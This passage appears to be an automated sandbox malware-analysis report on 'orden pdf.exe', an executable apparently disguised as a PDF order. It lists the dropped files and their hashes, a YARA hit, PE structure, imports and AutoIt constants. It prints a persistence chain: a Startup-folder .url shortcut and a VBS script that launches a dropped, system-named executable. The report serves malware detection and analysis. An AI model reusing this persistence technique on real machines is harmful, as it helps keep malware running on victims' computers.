                                            Process:C:\Windows\explorer.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Thu Jan 14 04:13:02 2021, atime=Thu Jan 14 04:13:02 2021, length=8192, window=hide
                                            Category:modified
                                            Size (bytes):11875
                                            Entropy (8bit):3.1804535272240964
                                            Encrypted:false
                                            SSDEEP:96:8ZxXpsTW0hAdRWkdBO7wu3IOsWeXOsTW0ozdRWk8nb/a:8Gq0SdUcdtq0+dUDa
                                            MD5:1431C5809358D89F20A3AF4C99ED7139
                                            SHA1:901E4F43BF9A1E22E9AFB1B67E2FE29DEFB201AB
                                            SHA-256:7EDB873D2EE70A9375E346917ECCA8B461CDB476770B69E04E22C39069A7AC4A
                                            SHA-512:840A0A38AEA60A3B196E50DB0CBF446C67D027AEF34AD44C1AB4C4D3BD3B23AA1EF3C5FC084EB598B5029FDBD2313B4BA29DD725E7A63AC24986A880CDA93968
                                            Malicious:false
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\assignedaccessproviderevents\.vbs>), ASCII text, with CR line terminators
                                            Category:dropped
                                            Size (bytes):79
                                            Entropy (8bit):4.630640678497035
                                            Encrypted:false
                                            SSDEEP:3:HRAbABGQVuOWXp5/feABo4LT2n:HRYF5OWXpkh4LT2
                                            MD5:E26FCBEC7D7F5645A042CD8ECABA9C12
                                            SHA1:B01931C3851E0DA006F62A368A7D8D3FEBEE9A00
                                            SHA-256:ABF2B2B43A3B5C48AC486C2FF780C8933A75EDAB16CFCFFF6DF6C25BB7F19877
                                            SHA-512:78A3263E8A65E4580AD28E569A1FD82226FDB3B2A04AEFA73D6BEFE0E6B8526C70A7EC8C01327D31F07B6EACCC39B53F24C0BE284D63D934C16FEB335FEAFF97
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                            Preview: [InternetShortcut].URL=file:///C:\Users\user\assignedaccessproviderevents\.vbs
                                            C:\Users\user\assignedaccessproviderevents\.vbs
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):137
                                            Entropy (8bit):4.675174417731891
                                            Encrypted:false
                                            SSDEEP:3:jaPcYonh3QBHoWXp5/feABo4hriQSHn:jk+h8IWXpkh4hOL
                                            MD5:DB5C80C48C179D717EE7AE1CC6F050CB
                                            SHA1:25DCF4FDE3CCD5983DC5B7BFCD9693F2B5D27654
                                            SHA-256:A3DAE6CCC4FA2C5A30511F2654699C07C948B4C428494E092CB76D75BD1943E4
                                            SHA-512:66B737706C45C71C20B5EAD7BC95094EE05011ACE0E4F7BDB23BFA124CF141F30574A2C62B4C9C8E49DEC16FC438F4CB99A8142847949CEA3361881FE7447CF2
                                            Malicious:false
                                            Preview: Set WshShell = WScript.CreateObject("WScript.Shell")..WshShell.Run """C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe"""
                                            C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.795101471729671
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:orden pdf.exe
                                            File size:1550336
                                            MD5:4f1ad14256cc9c420d78d69b468bab48
                                            SHA1:7734beec32b17c6ef0678533cc9634bd2c890c65
                                            SHA256:1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
                                            SHA512:38dbbf685b18d2540d739b0ff74bb00f20a1e0b1c142e40b7bbb2e451f6d8ea9e992eb01f77eff945a47bc57fb6ada9e184dd9d6f07e732c253449509deeec71
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25

                                            File Icon

                                            Icon Hash:70e0baaa9696f471

                                            Static PE Info

                                            General

                                            Entrypoint:0x425f74
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                            Time Stamp:0x5FFE0F2E [Tue Jan 12 21:05:50 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F08D0B731CFh
                                            jmp 00007F08D0B661E4h
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F08D0B6636Ah
                                            cmp edi, eax
                                            jc 00007F08D0B666CEh
                                            bt dword ptr [004C0158h], 01h
                                            jnc 00007F08D0B66369h
                                            rep movsb
                                            jmp 00007F08D0B6667Ch
                                            cmp ecx, 00000080h
                                            jc 00007F08D0B66534h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F08D0B66370h
                                            bt dword ptr [004BA370h], 01h
                                            jc 00007F08D0B66840h
                                            bt dword ptr [004C0158h], 00000000h
                                            jnc 00007F08D0B6650Dh
                                            test edi, 00000003h
                                            jne 00007F08D0B6651Eh
                                            test esi, 00000003h
                                            jne 00007F08D0B664FDh
                                            bt edi, 02h
                                            jnc 00007F08D0B6636Fh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F08D0B66373h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F08D0B663C5h
                                            bt esi, 03h
                                            jnc 00007F08D0B66418h
                                            movdqa xmm1, dqword ptr [esi+00h]

                                            Rich Headers

                                            Programming Language:
                                            • [RES] VS2012 UPD4 build 61030
                                            • [ASM] VS2012 UPD4 build 61030
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [LNK] VS2012 UPD4 build 61030

                                            Data Directories

                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0xb17d0 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x176000 | 0x6c4c | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x8b54f | 0x8b600 | False | 0.569949901906 | data | 6.68041374921 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | False | 0.330464397632 | data | 5.77019233319 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xba000 | 0x9d54 | 0x6200 | False | 0.164022640306 | data | 2.00269109997 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0xc4000 | 0xb17d0 | 0xb1800 | False | 0.592063710387 | data | 6.31952318701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x176000 | 0xa474 | 0xa600 | False | 0.501788403614 | data | 5.24542665412 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            Name | RVA | Size | Type | Language | Country
                                            RT_BITMAP | 0xc447c | 0x59802 | ASCII text, with very long lines, with no line terminators | |
                                            RT_ICON | 0x11dc80 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                            RT_ICON | 0x11dda8 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                            RT_ICON | 0x11ded0 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                            RT_ICON | 0x11dff8 | 0x497e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain
                                            RT_ICON | 0x122978 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | Great Britain
                                            RT_ICON | 0x1331a0 | 0x94a8 | data | English | Great Britain
                                            RT_ICON | 0x13c648 | 0x5488 | data | English | Great Britain
                                            RT_ICON | 0x141ad0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294917888 | English | Great Britain
                                            RT_ICON | 0x145cf8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | Great Britain
                                            RT_ICON | 0x1482a0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | Great Britain
                                            RT_ICON | 0x149348 | 0x988 | data | English | Great Britain
                                            RT_ICON | 0x149cd0 | 0x468 | GLS_BINARY_LSB_FIRST | English | Great Britain
                                            RT_RCDATA | 0x14a138 | 0x2b14c | data | |
                                            RT_GROUP_ICON | 0x175284 | 0x84 | data | English | Great Britain
                                            RT_GROUP_ICON | 0x175308 | 0x14 | data | English | Great Britain
                                            RT_GROUP_ICON | 0x17531c | 0x14 | data | English | Great Britain
                                            RT_GROUP_ICON | 0x175330 | 0x14 | data | English | Great Britain
                                            RT_VERSION | 0x175344 | 0xdc | data | English | Great Britain
                                            RT_MANIFEST | 0x175420 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain

                                            Imports

                                            DLL | Import
                                            WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                            VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                            WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                            MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                            WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                            PSAPI.DLL | GetProcessMemoryInfo
                                            IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                            USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                            UxTheme.dll | IsThemeActive
                                            KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                            USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                            GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                            COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                            ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                            SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                            ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                            OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                            Version Infos

                                            Description | Data
                                            Translation | 0x0809 0x04b0

                                            Possible Origin

                                            Language of compilation system | Country where language is spoken | Map
                                            English | Great Britain |

                                            Static AutoIT Info

                                            General

                                            Code:GLOBAL CONST $__DLG_WM_USER = 1024 GLOBAL CONST $BIF_BROWSEFILEJUNCTIONS = 65536 GLOBAL CONST $BIF_BROWSEFORCOMPUTER = 4096 GLOBAL CONST $BIF_BROWSEFORPRINTER = 8192 GLOBAL CONST $BIF_BROWSEINCLUDEFILES = 16384 GLOBAL CONST $BIF_BROWSEINCLUDEURLS = 128 GLOBAL CONST $BIF_DONTGOBELOWDOMAIN = 2 GLOBAL CONST $BIF_EDITBOX = 16 GLOBAL CONST $BIF_NEWDIALOGSTYLE = 64 GLOBAL CONST $BIF_NONEWFOLDERBUTTON = 512 GLOBAL CONST $BIF_NOTRANSLATETARGETS = 1024 GLOBAL CONST $BIF_RETURNFSANCESTORS = 8 GLOBAL CONST $BIF_RETURNONLYFSDIRS = 1 GLOBAL CONST $BIF_SHAREABLE = 32768 GLOBAL CONST $BIF_STATUSTEXT = 4 GLOBAL CONST $BIF_USENEWUI = BITOR ($BIF_EDITBOX , $BIF_NEWDIALOGSTYLE ) GLOBAL CONST $BIF_UAHINT = 256 GLOBAL CONST $BIF_VALIDATE = 32 GLOBAL CONST $BFFM_INITIALIZED = 1 GLOBAL CONST $BFFM_IUNKNOWN = 5 GLOBAL CONST $BFFM_SELCHANGED = 2 GLOBAL CONST $BFFM_VALIDATEFAILED = 4 GLOBAL CONST $BFFM_SETSTATUSTEXTA = $__DLG_WM_USER + 100 GLOBAL CONST $BFFM_ENABLEOK = $__DLG_WM_USER + 101 GLOBAL CONST $BFFM_SETSELECTIONA = $__DLG_WM_USER + 102 GLOBAL CONST $BFFM_SETSELECTIONW = $__DLG_WM_USER + 103 GLOBAL CONST $BFFM_SETSTATUSTEXTW = $__DLG_WM_USER + 104 GLOBAL CONST $BFFM_SETOKTEXT = $__DLG_WM_USER + 105 GLOBAL CONST $BFFM_SETEXPANDED = $__DLG_WM_USER + 106 GLOBAL CONST $CDERR_DIALOGFAILURE = 65535 GLOBAL CONST $CDERR_FINDRESFAILURE = 6 GLOBAL CONST $CDERR_INITIALIZATION = 2 GLOBAL CONST $CDERR_LOADRESFAILURE = 7 GLOBAL CONST $CDERR_LOADSTRFAILURE = 5 GLOBAL CONST $CDERR_LOCKRESFAILURE = 8 GLOBAL CONST $CDERR_MEMALLOCFAILURE = 9 GLOBAL CONST $CDERR_MEMLOCKFAILURE = 10 GLOBAL CONST $CDERR_NOHINSTANCE = 4 GLOBAL CONST $CDERR_NOHOOK = 11 GLOBAL CONST $CDERR_NOTEMPLATE = 3 GLOBAL CONST $CDERR_REGISTERMSGFAIL = 12 GLOBAL CONST $CDERR_STRUCTSIZE = 1 GLOBAL CONST $PDERR_CREATEICFAILURE = 4106 GLOBAL CONST $PDERR_DEFAULTDIFFERENT = 4108 GLOBAL CONST $PDERR_DNDMMISMATCH = 4105 GLOBAL CONST $PDERR_GETDEVMODEFAIL = 4101 GLOBAL CONST $PDERR_INITFAILURE 
= 4102 GLOBAL CONST $PDERR_LOADDRVFAILURE = 4100 GLOBAL CONST $PDERR_NODEFAULTPRN = 4104 GLOBAL CONST $PDERR_NODEVICES = 4103 GLOBAL CONST $PDERR_PARSEFAILURE = 4098 GLOBAL CONST $PDERR_PRINTERNOTFOUND = 4107 GLOBAL CONST $PDERR_RETDEFFAILURE = 4099 GLOBAL CONST $PDERR_SETUPFAILURE = 4097 GLOBAL CONST $CFERR_MAXLESSTHANMIN = 8194 GLOBAL CONST $CFERR_NOFONTS = 8193 GLOBAL CONST $FNERR_BUFFERTOOSMALL = 12291 GLOBAL CONST $FNERR_INVALIDFILENAME = 12290 GLOBAL CONST $FNERR_SUBCLASSFAILURE = 12289 GLOBAL CONST $FRERR_BUFFERLENGTHZERO = 16385 GLOBAL CONST $FR_DIALOGTERM = 64 GLOBAL CONST $FR_DOWN = 1 GLOBAL CONST $FR_ENABLEHOOK = 256 GLOBAL CONST $FR_ENABLETEMPLATE = 512 GLOBAL CONST $FR_ENABLETEMPLATEHANDLE = 8192 GLOBAL CONST $FR_FINDNEXT = 8 GLOBAL CONST $FR_HIDEUPDOWN = 16384 GLOBAL CONST $FR_HIDEMATCHCASE = 32768 GLOBAL CONST $FR_HIDEWHOLEWORD = 65536 GLOBAL CONST $FR_MATCHCASE = 4 GLOBAL CONST $FR_NOMATCHCASE = 2048 GLOBAL CONST $FR_NOUPDOWN = 1024 GLOBAL CONST $FR_NOWHOLEWORD = 4096 GLOBAL CONST $FR_REPLACE = 16 GLOBAL CONST $FR_REPLACEALL = 32 GLOBAL CONST $FR_SHOWHELP = 128 GLOBAL CONST $FR_WHOLEWORD = 2 GLOBAL CONST $SHFMT_ID_DEFAULT = 65535 GLOBAL CONST $SHFMT_OPT_FULL = 0 GLOBAL CONST $SHFMT_OPT_QUICKFORMAT = 1 GLOBAL CONST $SHFMT_OPT_SYSONLY = 2 GLOBAL CONST $SHFMT_ERROR = + 4294967295 GLOBAL CONST $SHFMT_CANCEL = + 4294967294 GLOBAL CONST $SHFMT_NOFORMAT = + 4294967293 GLOBAL CONST $CDM_FIRST = $__DLG_WM_USER + 100 GLOBAL CONST $CDM_GETSPEC = $CDM_FIRST GLOBAL CONST $CDM_GETFILEPATH = $CDM_FIRST + 1 GLOBAL CONST $CDM_GETFOLDERPATH = $CDM_FIRST + 2 GLOBAL CONST $CDM_GETFOLDERIDLIST = $CDM_FIRST + 3 GLOBAL CONST $CDM_SETCONTROLTEXT = $CDM_FIRST + 4 GLOBAL CONST $CDM_HIDECONTROL = $CDM_FIRST + 5 GLOBAL CONST $CDM_SETDEFEXT = $CDM_FIRST + 6 GLOBAL CONST $CDM_LAST = $__DLG_WM_USER + 200 GLOBAL CONST $CDN_FIRST = + 4294966695 GLOBAL CONST $CDN_INITDONE = $CDN_FIRST GLOBAL CONST $CDN_SELCHANGE = $CDN_FIRST + 4294967295 GLOBAL CONST $CDN_FOLDERCHANGE = $CDN_FIRST + 
